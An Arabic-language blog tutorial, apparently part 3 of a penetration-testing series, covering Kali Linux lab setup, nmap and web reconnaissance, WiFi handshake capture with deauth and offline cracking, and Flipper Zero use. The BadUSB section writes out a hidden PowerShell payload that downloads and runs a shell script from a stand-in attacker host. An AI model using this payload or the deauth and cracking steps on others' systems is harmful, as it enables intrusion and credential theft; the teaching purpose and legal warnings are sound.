القائمة
نبذة عني الخدمات المسيرة اعمل معي
Linux terminal with code
أمان مارس 7, 2026 • 25 دقائق للقراءة

Kali Linux Fundamentals: Build Your Hacking Laboratory

Set up Kali Linux, master nmap reconnaissance, capture WiFi handshakes with aircrack-ng, and connect your Flipper Zero to professional penetration testing workflows.

شارك:
Lee Foropoulos

Lee Foropoulos

25 دقائق للقراءة

مسار الهاكر: سلسلة من 5 أجزاء

الجزء 1: مقدمةالجزء 2: إتقان Flipperالجزء 3: أساسيات Kaliالجزء 4: الاستغلالالجزء 5: التدقيق الكامل

في الجزأين 1 و2، قمت بنسخ البطاقات وتحليل الترددات اللاسلكية وفهمت لماذا معظم "الأمان" مجرد مسرحية. رأيت الثغرات من الخارج. الآن تدخل إلى الداخل وتراها من منظور المهاجم.

Kali Linux هو توزيعة اختبار الاختراق المعيارية في الصناعة. يأتي محملاً مسبقاً بأكثر من 600 أداة أمنية. قد يبدو هذا مربكاً. معظم الدروس تلقيك في العمق بأوامر لا تفهمها وبدون سياق لماذا هي مهمة.

نحن نفعل هذا بشكل مختلف. بنهاية هذا المقال، سيكون لديك مختبر عامل، وستفهم استطلاع الشبكات على المستوى الأساسي، وستلتقط مصافحة WiFi الخاصة بك. كل خطوة تُبنى على السابقة.

معظم الدروس تلقيك في العمق بأوامر لا تفهمها وبدون سياق لماذا هي مهمة. كل خطوة هنا تُبنى على السابقة.

الجزء 1: بناء مختبرك

مختبرو الاختراق المحترفون لا يشغلون Kali على جهازهم الرئيسي. يستخدمون بيئات معزولة يمكن إعادة تعيينها وأخذ لقطات لها وتدميرها دون التأثير على النظام الأساسي. ستفعل الشيء نفسه.

الخيار أ: الآلة الافتراضية (موصى بها للتعلم)

الآلة الافتراضية تمنحك أكثر بيئة تعلم أماناً. يمكنك حفظ لقطات لتقدمك وارتكاب الأخطاء والعودة فوراً.

ما ستحتاجه

  • الجهاز المضيف: 16GB أو أكثر من الذاكرة، 50GB أو أكثر مساحة قرص فارغة، معالج حديث يدعم الافتراضية
  • برنامج الافتراضية: VirtualBox (مجاني) أو VMware Workstation Player (مجاني للاستخدام الشخصي)
  • Kali Linux: صورة VM رسمية جاهزة من kali.org

مشروع: إعداد Kali VM

الوقت: 30-45 دقيقة

الخطوات:

  1. حمّل صورة Kali VM لمشغل الافتراضية الخاص بك (VirtualBox أو VMware)
  2. استخرج الأرشيف المحمّل (يُنصح بـ 7-Zip لنظام Windows)
  3. استورد الآلة الافتراضية في مشغل الافتراضية
  4. اضبط الموارد: 4GB ذاكرة كحد أدنى (يُنصح بـ 8GB)، نواتي معالج أو أكثر
  5. فعّل محول الشبكة في وضع "Bridged" للوصول الكامل للشبكة
  6. شغّل الآلة الافتراضية وسجل الدخول ببيانات الاعتماد الافتراضية: kali / kali
  7. افتح الطرفية ونفّذ: sudo apt update && sudo apt full-upgrade -y
  8. أنشئ لقطة باسم "Fresh Install" للاسترداد السهل

التحقق من النجاح: يمكنك فتح الطرفية وتشغيل whoami ورؤية kali.

الخيار ب: أجهزة مخصصة (للتمرين الجاد)

عندما تصبح مرتاحاً مع Kali، الأجهزة المخصصة تزيل عبء الآلة الافتراضية وتتيح الوصول الكامل للعتاد، وهو أمر ضروري لاختبار الشبكات اللاسلكية.

توصيات الأجهزة

الخيار الاقتصاديThinkPad X230/T430 مستعمل ($100-150)، WiFi Intel مستبدل بـ Atheros AR9285
الخيار الحديثFramework Laptop مع وحدة WiFi متوافقة مع Linux
مستشعر مخصصRaspberry Pi 5 بسعة 4GB مع محول خارجي Alfa AWUS036ACH

حالياً، الآلة الافتراضية مثالية. الأجهزة المخصصة تصبح مهمة عندما تحتاج وضع المراقبة لاختبار الشبكات اللاسلكية (سنتناول ذلك لاحقاً في هذا المقال).

الخيار ج: Live USB (بدون حفظ)

Live USB يشغل Kali مباشرة بدون تثبيت. كل شيء يختفي عند إيقاف التشغيل. مفيد للاختبار على أجهزة مختلفة، لكنك ستفقد عملك كل جلسة ما لم تنشئ قسماً دائماً.

bash# Create bootable USB on Linux/Mac
sudo dd if=kali-linux-*.iso of=/dev/sdX bs=4M status=progress
# Replace sdX with your USB device (check with 'lsblk')
# On Windows: Use Rufus or balenaEtcher

أمر dd يدمر البيانات

أمر dd يكتب مباشرة على القرص بدون تأكيد. تحقق ثلاث مرات من اسم الجهاز. الكتابة على الجهاز الخاطئ ستمحو ذلك القرص بالكامل.

Kali Linux terminal with security tools running
بيئة Kali Linux المُعدّة بشكل صحيح هي أساس كل اختبار اختراق احترافي.

الجزء 2: عقلية الطرفية

قبل لمس أدوات الأمان، تحتاج أن تكون مرتاحاً في الطرفية. هذا ليس اختيارياً. واجهة المستخدم الرسومية موجودة في Kali، لكن العمل الحقيقي يحدث في سطر الأوامر.

التنقل الأساسي

bash# Know where you are
pwd                    # Print working directory

# Move around
cd /home/kali          # Go to home directory
cd ..                  # Go up one level
cd -                   # Go to previous directory

# See what's here
ls                     # List files
ls -la                 # List all files with details
ls -lah                # Human-readable sizes

# Read files
cat filename           # Display entire file
less filename          # Scrollable view (q to quit)
head -n 20 filename    # First 20 lines
tail -f filename       # Follow file in real-time (logs)

تصعيد الصلاحيات

العديد من أدوات الأمان تتطلب صلاحيات root. في Kali، sudo يمنحك صلاحيات root مؤقتة.

bashsudo command           # Run single command as root
sudo -i                # Start root shell (be careful)
whoami                 # Check current user
id                     # Show user and group IDs

Root بمسؤولية

التشغيل كـ root يعني عدم وجود شبكة أمان. خطأ مطبعي مثل rm -rf / سيدمر كل شيء. Kali الحديث يمنع هذا الأمر تحديداً، لكن المبدأ يبقى: افهم ما تشغله قبل أن تشغله.

إدارة العمليات

bashps aux                 # All running processes
top                    # Real-time process viewer
htop                   # Better process viewer (install if needed)

# Control processes
ctrl+c                 # Stop current process
ctrl+z                 # Suspend process
bg                     # Resume in background
fg                     # Bring to foreground

# Kill processes
kill PID               # Graceful termination
kill -9 PID            # Force kill (last resort)

أوامر الشبكة

baship a                   # Show network interfaces
ip route               # Show routing table
ping -c 4 8.8.8.8     # Test connectivity
curl ifconfig.me       # Your public IP

# DNS lookups
nslookup google.com
dig google.com

مشروع: التعرف على الطرفية

الوقت: 15 دقيقة

المهام:

  1. اعثر على عنوان IP الخاص بك على الشبكة المحلية باستخدام ip a
  2. حدد البوابة الافتراضية باستخدام ip route
  3. نفّذ ping للبوابة لتأكيد الاتصال
  4. اعرض جميع الملفات في /etc مرتبة حسب وقت التعديل: ls -lt /etc | head
  5. اقرأ أول 50 سطراً من /etc/passwd: head -n 50 /etc/passwd

الهدف: يجب أن تكون قادراً على التنقل والتحقق من حالة الشبكة وقراءة الملفات بدون تفكير.

الجزء 3: استطلاع الشبكة باستخدام Nmap

Nmap (مخطط الشبكة) هو أهم أداة ستتعلمها. يكتشف المضيفين، ويحدد الخدمات، ويكشف أنظمة التشغيل، ويرسم خريطة طوبولوجيا الشبكة. كل شيء آخر يُبنى على مخرجات nmap.

مسحك الأول

لنمسح شبكتك الخاصة. أولاً، حدد نطاق شبكتك:

bash# Find your local IP and subnet
ip a | grep inet
# Look for something like: inet 192.168.1.100/24
# The /24 means your network is 192.168.1.0-255
bash# Basic discovery scan (your network only)
sudo nmap -sn 192.168.1.0/24

# What this does:
# -sn = ping scan (no port scanning, just host discovery)
# /24 = scan all 256 addresses in this subnet

سترى مخرجات مثل:

textNmap scan report for 192.168.1.1
Host is up (0.0025s latency).
MAC Address: AA:BB:CC:DD:EE:FF (Manufacturer Name)

Nmap scan report for 192.168.1.50
Host is up (0.0042s latency).
MAC Address: 11:22:33:44:55:66 (Another Manufacturer)

هذا المسح الأول يخبرك: "هذه الأجهزة موجودة على شبكتي." الآن لنطرح أسئلة أعمق.

اكتشاف الخدمات

بمجرد معرفة المضيفين الموجودين، تريد معرفة الخدمات التي يشغلونها.

bash# Scan a single target for open ports and services
sudo nmap -sV 192.168.1.1
# -sV = Version detection (probe open ports for service info)

مخرجات شائعة:

textPORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.4p1
80/tcp   open  http     nginx 1.18.0
443/tcp  open  ssl/http nginx 1.18.0

كشف نظام التشغيل

bash# Detect OS (requires root)
sudo nmap -O 192.168.1.1

# Combined scan: OS detection + service versions + default scripts
sudo nmap -A 192.168.1.1

فهم حالات المنافذ

يُبلغ Nmap عن المنافذ في عدة حالات:

  • open - تطبيق يقبل الاتصالات بنشاط. هذا ما يبحث عنه المهاجمون.
  • closed - المنفذ يمكن الوصول إليه لكن لا يوجد تطبيق يستمع. المضيف نشط لكن لا يوجد شيء هناك.
  • filtered - جدار ناري أو مرشح يحجب الفحص. لا يمكن تحديد إن كان مفتوحاً أم مغلقاً.
  • unfiltered - المنفذ يمكن الوصول إليه لكن nmap لا يستطيع تحديد إن كان مفتوحاً أم مغلقاً.

أنواع المسح والتخفي

bash# TCP Connect scan (default, noisy but reliable)
sudo nmap -sT target

# SYN scan (stealthier, default with root)
sudo nmap -sS target

# UDP scan (slow but important - many services use UDP)
sudo nmap -sU target

# Scan all 65535 ports (thorough but slow)
sudo nmap -p- target

# Scan specific ports
sudo nmap -p 22,80,443,8080 target

# Top 1000 common ports (default behavior)
sudo nmap target

محرك البرمجة النصية لـ Nmap (NSE)

NSE يوسع nmap بنصوص متخصصة لاكتشاف الثغرات وتعداد الخدمات والمزيد.

bash# Run default safe scripts
sudo nmap -sC target

# Check for vulnerabilities
sudo nmap --script vuln target

# SMB enumeration (Windows shares)
sudo nmap --script smb-enum-shares target

# HTTP enumeration
sudo nmap --script http-enum target

# List available scripts
ls /usr/share/nmap/scripts/ | head -20

مشروع: ارسم خريطة شبكتك

الوقت: 30 دقيقة

المتطلبات المسبقة: معرفة نطاق شبكتك من ip a

  1. اكتشف جميع المضيفين: sudo nmap -sn YOUR_NETWORK/24
  2. اكتب قائمة بالمضيفين المكتشفين وعناوين MAC الخاصة بهم
  3. اختر الراوتر (عادة .1) ونفّذ: sudo nmap -sV -sC YOUR_ROUTER
  4. حدد جميع المنافذ المفتوحة والخدمات على الراوتر
  5. نفّذ sudo nmap -A YOUR_COMPUTER لترى ما يكشفه جهازك

وثّق: أنشئ ملفاً نصياً يسرد كل جهاز وعنوان IP وMAC والخدمات. هذه خريطة شبكتك.

امسح فقط الشبكات التي تملكها

مسح الشبكات بدون تصريح غير قانوني في معظم الولايات القضائية. حتى مسح nmap بسيط قد يُعتبر وصولاً غير مصرح به. ابقَ على شبكتك وأجهزتك والشبكات التي لديك إذن كتابي صريح فيها.

الجزء 4: استطلاع الويب

مسح nmap الخاص بك على الأرجح وجد خدمات HTTP (المنافذ 80، 443، 8080). لنفهم ما يعمل هناك.

Whatweb: تعريف سريع للخدمة

bash# Identify web technologies
whatweb http://192.168.1.1

مثال على المخرجات:

texthttp://192.168.1.1 [200 OK] Country[RESERVED][ZZ],
HTTPServer[nginx/1.18.0], IP[192.168.1.1],
Title[Router Admin], nginx[1.18.0]

Nikto: ماسح ثغرات الويب

bash# Scan for common web vulnerabilities
nikto -h http://192.168.1.1

# This checks for:
# - Outdated server software
# - Dangerous files/CGIs
# - Misconfigurations
# - Default credentials

تعداد المجلدات: ما المخفي؟

خوادم الويب غالباً لديها مجلدات غير مرتبطة من الصفحة الرئيسية: لوحات إدارة، ملفات إعدادات، ملفات نسخ احتياطي.

bash# Gobuster: directory brute-forcing
gobuster dir -u http://192.168.1.1 -w /usr/share/wordlists/dirb/common.txt

اكتشافات شائعة:

text/admin   (Status: 301)
/backup  (Status: 403)
/config  (Status: 200)
/login   (Status: 200)

موقع قوائم الكلمات

Kali يتضمن قوائم كلمات واسعة في /usr/share/wordlists/. المجلدات الأكثر شيوعاً: dirb/، dirbuster/، rockyou.txt (كلمات مرور)، وseclists/ (مجموعة شاملة).

مشروع: تدقيق واجهة الويب للراوتر

الوقت: 20 دقيقة

  1. نفّذ whatweb http://YOUR_ROUTER_IP لتحديد الخادم
  2. نفّذ nikto -h http://YOUR_ROUTER_IP للتحقق من الثغرات
  3. نفّذ gobuster dir -u http://YOUR_ROUTER_IP -w /usr/share/wordlists/dirb/small.txt
  4. زر المجلدات المكتشفة في المتصفح
  5. سجّل أي لوحات إدارة أو أرقام إصدارات أو اكتشافات مثيرة للاهتمام

اكتشاف شائع: صفحات إدارة الراوتر مكشوفة ببيانات اعتماد افتراضية.

Server room with network infrastructure
استطلاع الشبكة يكشف الطوبولوجيا الكاملة للبيئة المستهدفة، من الراوترات إلى الخدمات المخفية.

الجزء 5: الاستطلاع اللاسلكي

هنا تصبح الأمور مثيرة. شبكات WiFi تبث باستمرار، وبالأدوات الصحيحة، يمكنك التقاط مصافحات المصادقة: التبادل المشفر الذي يحدث عند اتصال جهاز.

متطلبات العتاد

WiFi المدمج لديك على الأرجح لن يعمل لهذا. تحتاج محولاً يدعم وضع المراقبة وحقن الحزم. يُنصح بـ: Alfa AWUS036ACH (حوالي $50) أو Alfa AWUS036ACM (حوالي $45). تعمل مباشرة مع Kali.

فهم وضع المراقبة

وضع WiFi العادي ("managed mode") يستقبل فقط الحزم الموجهة لجهازك. وضع المراقبة يلتقط جميع الحزم في النطاق، حركة مرور كل جهاز على القناة.

bash# Check your wireless interfaces
iwconfig
# Look for your adapter (often wlan0 or wlan1)

# Kill interfering processes
sudo airmon-ng check kill

# Enable monitor mode
sudo airmon-ng start wlan0
# Your interface is now wlan0mon

مسح الشبكات

bash# Start capturing wireless traffic
sudo airodump-ng wlan0mon

# You'll see:
# BSSID  = Router MAC address
# PWR    = Signal strength (higher = closer)
# CH     = Channel
# ENC    = Encryption (WPA2, WPA3, OPN)
# ESSID  = Network name

# Press Ctrl+C to stop

ما تراه هو كل شبكة WiFi في النطاق، إعدادات أمانها، وغالباً الأجهزة المتصلة بها. هذا ما يراه war driver عند مسح الأحياء.

التقاط المصافحة

عندما يتصل جهاز بشبكة WPA2، تحدث مصافحة رباعية. إذا التقطت هذه المصافحة، يمكنك محاولة كسر كلمة المرور دون اتصال.

bash# Focus on your target network (your own network!)
sudo airodump-ng -c CHANNEL --bssid ROUTER_MAC -w capture wlan0mon
# -c CHANNEL = Target's channel from previous scan
# --bssid = Target router's MAC address
# -w capture = Save to files starting with "capture"

# Now wait for a device to connect...

# Or force a reconnection (on YOUR network only):
# In a new terminal:
sudo aireplay-ng --deauth 5 -a ROUTER_MAC wlan0mon
# This sends 5 deauth packets, disconnecting clients
# They automatically reconnect, generating a handshake

عند التقاط المصافحة، يعرض airodump-ng [ WPA handshake: XX:XX:XX:XX:XX:XX ] في الزاوية العلوية اليمنى.

هجمات Deauth غير قانونية

إرسال حزم إلغاء المصادقة لشبكات لا تملكها جريمة فيدرالية بموجب قانون الاحتيال وإساءة استخدام الكمبيوتر (في الولايات المتحدة) وقوانين مماثلة في أماكن أخرى. اختبر فقط على شبكتك. الهدف هو فهم الثغرة، وليس مهاجمة الآخرين.

كسر المصافحة

بمصافحة ملتقطة، يمكنك محاولة كسر كلمة المرور دون اتصال باستخدام قائمة كلمات:

bash# Crack using a wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

# If the password is in the wordlist, you'll see:
# KEY FOUND! [ password123 ]

# For stronger passwords, use hashcat (GPU-accelerated)
# First, convert capture format:
cap2hccapx capture-01.cap capture.hccapx

# Then crack with hashcat:
hashcat -m 22000 capture.hccapx /usr/share/wordlists/rockyou.txt
14M+
كلمة مرور حقيقية من اختراقات بيانات فعلية مضمنة في rockyou.txt، قائمة الكلمات الافتراضية المستخدمة لكسر مصافحات WiFi الملتقطة.

فحص واقعية قوة كلمات المرور

rockyou.txt يحتوي على أكثر من 14 مليون كلمة مرور من اختراقات بيانات حقيقية. إذا كانت كلمة مرور WiFi الخاصة بك "password123" أو "summer2024" أو اسم كلبك، يمكن كسرها في ثوانٍ. كلمة مرور عشوائية من 12 حرفاً أو أكثر ستحتاج ملايين السنين لكسرها بالقوة الغاشمة.

مشروع: اختبر أمان WiFi الخاص بك

الوقت: 45 دقيقة

المتطلبات المسبقة: محول WiFi خارجي يدعم وضع المراقبة

  1. فعّل وضع المراقبة: sudo airmon-ng start wlan0
  2. امسح الشبكات: sudo airodump-ng wlan0mon
  3. سجّل القناة وBSSID لشبكتك
  4. التقط على قناتك: sudo airodump-ng -c CHANNEL --bssid YOUR_BSSID -w mywifi wlan0mon
  5. أعد توصيل جهاز بشبكة WiFi (أو استخدم deauth على شبكتك فقط)
  6. أكّد التقاط المصافحة
  7. اختبر ضد rockyou.txt: aircrack-ng -w /usr/share/wordlists/rockyou.txt mywifi-01.cap

النتيجة: إذا وُجدت كلمة مرورك، غيّرها فوراً إلى شيء عشوائي وطويل (20 حرفاً أو أكثر).

الجزء 6: توصيل Flipper Zero الخاص بك

تتذكر كل تلك الالتقاطات من الجزء 2؟ لندمجها في سير عملك مع Kali.

نقل الملفات

bash# Connect Flipper via USB
# It appears as a mass storage device

# Mount if not auto-mounted
sudo mount /dev/sda1 /mnt/flipper

# Your captures are in:
/mnt/flipper/subghz/       # Sub-GHz captures
/mnt/flipper/nfc/          # NFC dumps
/mnt/flipper/infrared/     # IR captures
/mnt/flipper/lfrfid/       # 125kHz RFID
/mnt/flipper/badusb/       # BadUSB scripts

تحليل تفريغات NFC

bash# Install libnfc tools
sudo apt install libnfc-bin mfoc mfcuk

# Flipper saves NFC as .nfc text format
# Convert to binary for analysis:
python3 flipper_nfc_to_mfd.py card.nfc card.mfd

# Analyze MIFARE Classic dump
hexdump -C card.mfd | less

تحليل Sub-GHz

bash# Flipper's .sub files are text-based
cat garage_door.sub

# Contains:
# - Frequency (315MHz, 433MHz, etc.)
# - Protocol or RAW data
# - Timing information

# For deeper RF analysis, use:
# - Universal Radio Hacker (URH)
# - GNU Radio
# - rtl_433 (with SDR hardware)

تطوير BadUSB

أنشئ حمولات BadUSB في Kali، اختبرها على Flipper:

bash# Flipper uses DuckyScript-compatible syntax
# Create payload on Kali:
cat > kali_connect.txt << 'EOF'
DELAY 1000
GUI r
DELAY 500
STRING powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8000/shell.ps1')"
ENTER
EOF

# Host the payload from Kali:
python3 -m http.server 8000

# Copy to Flipper's badusb folder
cp kali_connect.txt /mnt/flipper/badusb/

حمولات BadUSB قوية

هذه النصوص البرمجية تُنفذ تلقائياً عند التوصيل. حمولة خبيثة يمكنها تثبيت أبواب خلفية أو سرقة بيانات الاعتماد أو تدمير البيانات في ثوانٍ. استخدم فقط على أجهزتك للاختبار. لا تترك Flipper أبداً في مكان قد يوصله شخص آخر.

الجزء 7: التوثيق وسير العمل

مختبرو الاختراق المحترفون لا يشغلون الأدوات فحسب. يوثقون كل شيء. التوثيق الجيد يفصل الهواة عن المحترفين.

تدوين الملاحظات بـ CherryTree

bash# Install CherryTree (hierarchical note-taking)
sudo apt install cherrytree

# Organize notes by:
# - Target/network
# - Reconnaissance
# - Enumeration
# - Vulnerabilities
# - Exploitation attempts
# - Post-exploitation

حفظ مخرجات Nmap

bash# Save in all formats
sudo nmap -sV -sC -oA scan_results target

# Creates:
# scan_results.nmap (human-readable)
# scan_results.xml  (parseable)
# scan_results.gnmap (greppable)

تسجيل الجلسة

bash# Log entire terminal session
script session_$(date +%Y%m%d_%H%M%S).log

# Now every command and output is recorded
# Type 'exit' to stop logging

مسار الهاكر

سلسلة من 5 أجزاء تنقلك من الفضول إلى الكفاءة.

الجزء 1: مقدمة الجزء 2: إتقان Flipper الجزء 3: أساسيات Kali ✓ الجزء 4: الاستغلال الجزء 5: التدقيق الكامل

قائمة تحقق الجزء 3

☐ إعداد المختبر: Kali VM يعمل، محدّث، لقطة محفوظة

☐ الطرفية: مرتاح مع التنقل والصلاحيات والتحكم بالعمليات

☐ Nmap: الشبكة مُرسّمة، الخدمات محددة، الراوتر ممسوح

☐ استطلاع الويب: واجهة ويب الراوتر تم تحليلها بـ whatweb/nikto

☐ اللاسلكي: وضع المراقبة مُفعّل، الشبكات ممسوحة

☐ المصافحة: مصافحة WiFi الخاصة ملتقطة ومختبرة

☐ Flipper: الملفات منقولة، سير العمل مفهوم

☐ التوثيق: الملاحظات منظمة، عمليات المسح محفوظة

خطة عمل أساسيات Kali 0/6

ما التالي

لقد بنيت مختبرك وتعلمت مرحلة الاستطلاع. يمكنك اكتشاف المضيفين وتحديد الخدمات والتقاط المصافحات اللاسلكية. تفهم ما يراه المهاجمون عند النظر إلى شبكة.

في الجزء 4، ننتقل من الاستطلاع إلى الاستغلال. ستتعلم:

  • Metasploit Framework، السكين السويسري للاستغلال
  • سير عمل استغلال الثغرات الشائعة
  • تقنيات ما بعد الاستغلال: ما يحدث بعد الوصول الأولي
  • تصعيد الصلاحيات: من مستخدم عادي إلى مسؤول
  • التمحور: استخدام نظام مخترق لمهاجمة آخرين

الاستطلاع يخبرك أين الأبواب. الاستغلال يعلمك كيف تمر من خلالها.

لقد رسمت خريطة المنطقة. الآن تتعلم التنقل فيها. الجزء 4 ينقلك من مراقب إلى مُشغّل.

نراكم في الجزء 4.

How was this article?

شارك

Link copied to clipboard!

You Might Also Like

Lee Foropoulos

Lee Foropoulos

Business Development Lead at Lookatmedia, fractional executive, and founder of gotHABITS.

🔔

La tufawwit ay maqal

Ihsal ala isharat inda nashr maqalat jadida. La yulzam barid iliktiruni.

Satara laafita fil mawqi inda wujud maqal jadid, wa ishaar min almutasaffih idha samahta.

Isharat almutasaffih faqat. Bidun rasail muzaaja.